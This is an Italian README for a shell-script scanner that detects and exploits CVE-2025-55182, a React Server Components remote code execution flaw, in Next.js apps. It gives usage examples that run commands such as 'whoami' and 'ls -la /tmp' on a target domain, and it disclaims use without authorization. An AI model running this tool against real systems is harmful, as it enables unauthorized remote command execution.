
Scanner da riga di comando per rilevare e sfruttare CVE-2025-55182 (React Server Components RCE) nelle applicazioni Next.js. Supporta l'esecuzione di comandi personalizzati per test di sicurezza autorizzati.
Semplice strumento da riga di comando per rilevare e sfruttare CVE-2025-55182 (React Server Components RCE) in applicazioni Next.js.

chmod +x scanner.sh
# Scansione con comando predefinito (id)
./scanner.sh -d example.com
# Esecuzione di un comando personalizzato
./scanner.sh -d example.com -c "whoami"
# Con URL completo
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - Dominio/URL di destinazione (obbligatorio)-c, --command - Comando da eseguire (predefinito: id)# Verifica se il target è vulnerabile
./scanner.sh -d vulnerable-app.com
# Ottieni informazioni di sistema
./scanner.sh -d vulnerable-app.com -c "uname -a"
# Elenca file
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Questo strumento è esclusivamente per scopi educativi e di test di sicurezza autorizzati. Non utilizzarlo contro sistemi di cui non sei proprietario o per cui non hai il permesso di testare.